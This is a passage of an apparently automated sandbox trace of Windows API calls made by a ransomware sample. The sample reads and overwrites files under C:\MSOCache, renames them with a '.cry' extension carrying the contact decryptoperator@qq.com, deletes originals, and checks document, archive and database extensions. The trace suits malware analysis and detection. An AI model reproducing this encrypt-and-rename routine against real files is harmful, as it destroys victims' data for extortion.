lpNumberOfBytesWritten=0x329fc9c*=0xe2, lpOverlapped=0x0) returned 1 [0048.760] SetEndOfFile (hFile=0x16c) returned 1 [0048.760] CloseHandle (hObject=0x16c) returned 1 [0048.760] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.760] SetEndOfFile (hFile=0x1c0) returned 1 [0048.761] CloseHandle (hObject=0x1c0) returned 1 [0048.762] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0048.762] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 1 [0048.762] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.762] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.762] lstrlenW (lpString=".doc") returned 4 [0048.762] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0048.762] lstrlenW (lpString=".docx") returned 5 [0048.762] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0048.762] lstrlenW (lpString=".pdf") returned 4 [0048.762] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0048.762] lstrlenW (lpString=".xls") returned 4 [0048.762] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0048.762] lstrlenW (lpString=".xlsx") returned 5 [0048.762] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0048.762] lstrlenW (lpString=".ppt") returned 4 [0048.762] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0048.762] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.762] lstrlenW (lpString=".zip") returned 4 [0048.762] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0048.762] lstrlenW (lpString=".rar") returned 4 [0048.762] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0048.762] lstrlenW (lpString=".bz2") returned 4 [0048.762] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0048.763] lstrlenW (lpString=".7z") returned 3 [0048.763] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0048.763] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.763] lstrlenW (lpString=".dbf") returned 4 [0048.763] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0048.763] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.763] lstrlenW (lpString=".1cd") returned 4 [0048.763] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0048.763] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.763] lstrlenW (lpString=".jpg") returned 4 [0048.763] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0048.763] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.763] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.763] lstrlenW (lpString=".doc") returned 4 [0048.763] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0048.763] lstrlenW (lpString=".docx") returned 5 [0048.763] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0048.763] lstrlenW (lpString=".pdf") returned 4 [0048.763] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0048.763] lstrlenW (lpString=".xls") returned 4 [0048.763] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0048.763] lstrlenW (lpString=".xlsx") returned 5 [0048.763] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0048.763] lstrlenW (lpString=".ppt") returned 4 [0048.763] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0048.763] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.763] lstrlenW (lpString=".zip") returned 4 [0048.763] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0048.763] lstrlenW (lpString=".rar") returned 4 [0048.763] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0048.763] lstrlenW (lpString=".bz2") returned 4 [0048.763] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0048.763] lstrlenW (lpString=".7z") returned 3 [0048.763] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0048.763] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.763] lstrlenW (lpString=".dbf") returned 4 [0048.763] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0048.764] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.764] lstrlenW (lpString=".1cd") returned 4 [0048.764] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0048.764] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.764] lstrlenW (lpString=".jpg") returned 4 [0048.764] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0048.764] lstrcmpiW (lpString1=".dll", lpString2=".cry") returned 1 [0048.764] lstrlenW (lpString="osetup.dll") returned 10 [0048.764] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0048.764] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=7378792) returned 1 [0048.764] CloseHandle (hObject=0x1c0) returned 1 [0048.764] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll")) returned 0x2020 [0048.766] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0048.771] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0048.771] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0048.771] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc6c | out: lpNewFilePointer=0x0) returned 1 [0048.771] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.771] ReadFile (in: hFile=0x208, lpBuffer=0x3d90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d90058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.855] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.856] ReadFile (in: hFile=0x208, lpBuffer=0x3dd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3dd0058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.869] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x329fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0048.869] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.869] ReadFile (in: hFile=0x208, lpBuffer=0x3e10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e10058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.965] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.965] WriteFile (in: hFile=0x208, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0x329fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fcb0*=0xc0100, lpOverlapped=0x0) returned 1 [0048.975] SetEndOfFile (hFile=0x208) returned 1 [0048.985] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x43b0048 [0048.988] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.988] WriteFile (in: hFile=0x208, lpBuffer=0x43b0048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x43b0048*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.990] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.990] WriteFile (in: hFile=0x208, lpBuffer=0x43b0048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x43b0048*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.991] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.992] WriteFile (in: hFile=0x208, lpBuffer=0x43b0048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x43b0048*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0049.042] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x43b0048 | out: hHeap=0x600000) returned 1 [0049.045] CloseHandle (hObject=0x208) returned 1 [0049.520] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0049.520] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0049.520] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0049.520] lstrlenW (lpString=".doc") returned 4 [0049.520] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0049.520] lstrlenW (lpString=".docx") returned 5 [0049.520] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0049.520] lstrlenW (lpString=".pdf") returned 4 [0049.520] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0049.520] lstrlenW (lpString=".xls") returned 4 [0049.520] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0049.520] lstrlenW (lpString=".xlsx") returned 5 [0049.520] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0049.520] lstrlenW (lpString=".ppt") returned 4 [0049.520] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0049.520] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0049.520] lstrlenW (lpString=".zip") returned 4 [0049.520] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0049.520] lstrlenW (lpString=".rar") returned 4 [0049.520] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0049.520] lstrlenW (lpString=".bz2") returned 4 [0049.520] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0049.520] lstrlenW (lpString=".7z") returned 3 [0049.520] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0049.520] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0049.520] lstrlenW (lpString=".dbf") returned 4 [0049.520] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0049.520] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0049.520] lstrlenW (lpString=".1cd") returned 4 [0049.521] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0049.521] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0049.521] lstrlenW (lpString=".jpg") returned 4 [0049.521] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0049.521] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0049.521] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0049.521] lstrlenW (lpString=".doc") returned 4 [0049.521] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0049.521] lstrlenW (lpString=".docx") returned 5 [0049.521] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0049.521] lstrlenW (lpString=".pdf") returned 4 [0049.521] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0049.521] lstrlenW (lpString=".xls") returned 4 [0049.521] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0049.521] lstrlenW (lpString=".xlsx") returned 5 [0049.521] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0049.521] lstrlenW (lpString=".ppt") returned 4 [0049.521] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0049.521] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0049.521] lstrlenW (lpString=".zip") returned 4 [0049.521] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0049.521] lstrlenW (lpString=".rar") returned 4 [0049.521] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0049.521] lstrlenW (lpString=".bz2") returned 4 [0049.521] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0049.521] lstrlenW (lpString=".7z") returned 3 [0049.521] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0049.521] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0049.521] lstrlenW (lpString=".dbf") returned 4 [0049.521] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0049.521] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0049.521] lstrlenW (lpString=".1cd") returned 4 [0049.521] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0049.521] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0049.521] lstrlenW (lpString=".jpg") returned 4 [0049.521] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0049.522] lstrcmpiW (lpString1=".msi", lpString2=".cry") returned 1 [0049.522] lstrlenW (lpString="PrjProrWW.msi") returned 13 [0049.522] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0049.630] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=10798080) returned 1 [0049.630] CloseHandle (hObject=0x190) returned 1 [0049.630] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi")) returned 0x2020 [0049.630] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0049.630] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0049.631] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0049.631] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc6c | out: lpNewFilePointer=0x0) returned 1 [0049.631] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0049.631] ReadFile (in: hFile=0x190, lpBuffer=0x3d90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d90058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0049.654] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x36ec00, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0049.654] ReadFile (in: hFile=0x190, lpBuffer=0x3dd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3dd0058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0049.715] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x329fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0049.715] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xa0c400, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0049.715] ReadFile (in: hFile=0x190, lpBuffer=0x3e10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e10058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0049.863] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.863] WriteFile (in: hFile=0x190, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xc0106, lpNumberOfBytesWritten=0x329fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fcb0*=0xc0106, lpOverlapped=0x0) returned 1 [0049.880] SetEndOfFile (hFile=0x190) returned 1 [0049.880] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3fd40b0 [0049.880] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0049.880] WriteFile (in: hFile=0x190, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0049.880] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x36ec00, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0049.880] WriteFile (in: hFile=0x190, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.114] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xa0c400, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0050.114] WriteFile (in: hFile=0x190, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.118] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3fd40b0 | out: hHeap=0x600000) returned 1 [0050.120] CloseHandle (hObject=0x190) returned 1 [0050.121] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0050.121] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0050.121] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0050.121] lstrlenW (lpString=".doc") returned 4 [0050.121] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0050.121] lstrlenW (lpString=".docx") returned 5 [0050.121] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0050.121] lstrlenW (lpString=".pdf") returned 4 [0050.121] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0050.121] lstrlenW (lpString=".xls") returned 4 [0050.121] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0050.121] lstrlenW (lpString=".xlsx") returned 5 [0050.121] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0050.121] lstrlenW (lpString=".ppt") returned 4 [0050.121] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0050.121] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0050.121] lstrlenW (lpString=".zip") returned 4 [0050.121] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0050.121] lstrlenW (lpString=".rar") returned 4 [0050.121] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0050.121] lstrlenW (lpString=".bz2") returned 4 [0050.121] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0050.121] lstrlenW (lpString=".7z") returned 3 [0050.121] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0050.121] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0050.121] lstrlenW (lpString=".dbf") returned 4 [0050.121] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0050.121] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0050.121] lstrlenW (lpString=".1cd") returned 4 [0050.122] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0050.122] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0050.122] lstrlenW (lpString=".jpg") returned 4 [0050.122] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0050.122] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0050.122] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0050.122] lstrlenW (lpString=".doc") returned 4 [0050.122] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0050.122] lstrlenW (lpString=".docx") returned 5 [0050.122] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0050.122] lstrlenW (lpString=".pdf") returned 4 [0050.122] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0050.122] lstrlenW (lpString=".xls") returned 4 [0050.122] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0050.122] lstrlenW (lpString=".xlsx") returned 5 [0050.122] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0050.122] lstrlenW (lpString=".ppt") returned 4 [0050.122] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0050.122] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0050.122] lstrlenW (lpString=".zip") returned 4 [0050.122] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0050.122] lstrlenW (lpString=".rar") returned 4 [0050.122] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0050.122] lstrlenW (lpString=".bz2") returned 4 [0050.122] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0050.123] lstrlenW (lpString=".7z") returned 3 [0050.123] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0050.123] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0050.123] lstrlenW (lpString=".dbf") returned 4 [0050.123] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0050.123] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0050.123] lstrlenW (lpString=".1cd") returned 4 [0050.123] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 